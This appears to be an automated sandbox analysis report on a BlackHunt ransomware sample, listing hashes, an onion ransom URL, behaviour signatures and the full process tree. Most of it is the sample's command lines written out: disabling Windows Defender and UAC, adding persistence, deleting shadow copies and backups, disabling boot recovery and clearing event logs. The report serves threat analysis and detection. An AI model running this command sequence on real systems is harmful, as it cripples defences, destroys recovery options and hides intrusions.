Analysis
max time kernel: 91s
max time network: 106s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 26/12/2022, 10:59
Static task: static1
Behavioral task: behavioral1
Sample: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Resource: win7-20220812-en
Behavioral task: behavioral2
Sample: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Resource: win10v2004-20220901-en
General
Target: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Size: 718KB
MD5: d7a24de75b761cb98f580dafda4ba885
SHA1: 86dc51cfc817937f9525b8aa2fa71e918288a44d
SHA256: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f
SHA512: c3fd50a296b4d251a614816756eb17632779c0ef0e72826d9d276ccae8b1689ca0523a22027509ce20bf125f858f713b08967ae55501c457bc9d8fca956b0e9e
SSDEEP: 12288:YuLRIEFPULfzlsH5HCSSv5zEWptZ/Vlt:YeRIEF6zlsu5AWptRVlt
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid | Process
1016 | fsutil.exe
5108 | fsutil.exe
Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
UAC bypass
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Clears Windows event logs 1 TTPs 5 IoCs
pid | Process
3748 | wevtutil.exe
1192 | wevtutil.exe
4404 | wevtutil.exe
3032 | wevtutil.exe
2348 | wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid | Process
2060 | bcdedit.exe
2528 | bcdedit.exe
2876 | bcdedit.exe
5004 | bcdedit.exe
pid | Process
5072 | wbadmin.exe
3772 | wbadmin.exe
Disables Task Manager via registry modification
Disables use of System Restore points 1 TTPs
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Adds Run key to start application 2 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityService = "C:\\Users\\Admin\\AppData\\Local\\Temp\\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " | reg.exe
Checks whether UAC is enabled
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
4 | ip-api.com
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Drops file in Program Files directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
3732 | schtasks.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
476 | vssadmin.exe
4168 | vssadmin.exe
Kills process with taskkill 1 IoCs
pid | Process
4532 | taskkill.exe
Modifies registry class 9 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Classes\Black | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Black\ | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\.Black\DefaultIcon | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Black\DefaultIcon | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\.Black | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Black\ | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid | Process
4848 | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
4848 | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
4848 | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Suspicious use of AdjustPrivilegeToken 17 IoCs
description | pid | Process
Token: SeBackupPrivilege | 3992 | vssvc.exe
Token: SeRestorePrivilege | 3992 | vssvc.exe
Token: SeAuditPrivilege | 3992 | vssvc.exe
Token: SeBackupPrivilege | 4116 | wbengine.exe
Token: SeRestorePrivilege | 4116 | wbengine.exe
Token: SeSecurityPrivilege | 4116 | wbengine.exe
Token: SeSecurityPrivilege | 3748 | wevtutil.exe
Token: SeBackupPrivilege | 3748 | wevtutil.exe
Token: SeSecurityPrivilege | 1192 | wevtutil.exe
Token: SeBackupPrivilege | 1192 | wevtutil.exe
Token: SeSecurityPrivilege | 4404 | wevtutil.exe
Token: SeBackupPrivilege | 4404 | wevtutil.exe
Token: SeSecurityPrivilege | 3032 | wevtutil.exe
Token: SeBackupPrivilege | 3032 | wevtutil.exe
Token: SeSecurityPrivilege | 2348 | wevtutil.exe
Token: SeBackupPrivilege | 2348 | wevtutil.exe
Token: SeDebugPrivilege | 4532 | taskkill.exe
Suspicious use of WriteProcessMemory 64 IoCs
System policy modification 1 TTPs 3 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe"
  - UAC bypass
  - Checks computer location settings
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID: 4848
  [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f
    - Suspicious use of WriteProcessMemory
    PID: 2284
    [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f
      - Modifies registry class
      PID: 3756
  [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Suspicious use of WriteProcessMemory
    PID: 64
    [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Modifies registry class
      PID: 4616
  [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f
    - Suspicious use of WriteProcessMemory
    PID: 1908
    [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f
      - Modifies registry class
      PID: 5068
  [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Suspicious use of WriteProcessMemory
    PID: 1756
    [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Modifies registry class
      PID: 1740
  [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    - Suspicious use of WriteProcessMemory
    PID: 4244
    [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      - Adds Run key to start application
      PID: 1840
  [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    PID: 5084
    [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      PID: 4688
  [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    PID: 4460
    [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      - Modifies Windows Defender Real-time Protection settings
      PID: 4800
  [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    - Suspicious use of WriteProcessMemory
    PID: 1284
    [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
      PID: 2876
  [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    PID: 2944
    [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      PID: 4148
  [2] C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    - Suspicious use of WriteProcessMemory
    PID: 5112
    [3] C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
      PID: 3532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4260
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:4884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:440
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:60
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4960
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1000
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4496
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1168
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:5080
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3212
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:4156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f2⤵PID:4468
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f3⤵
- Adds Run key to start application
PID:2392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f2⤵PID:3292
-
C:\Windows\system32\schtasks.exeSchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f3⤵
- Creates scheduled task(s)
PID:3732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1944
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4152
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:548
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4460
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4524
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1708
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2420
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2208
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1848
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3756
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3212
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2968
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4360
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1016
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5096
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2272
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2876
-
-
-
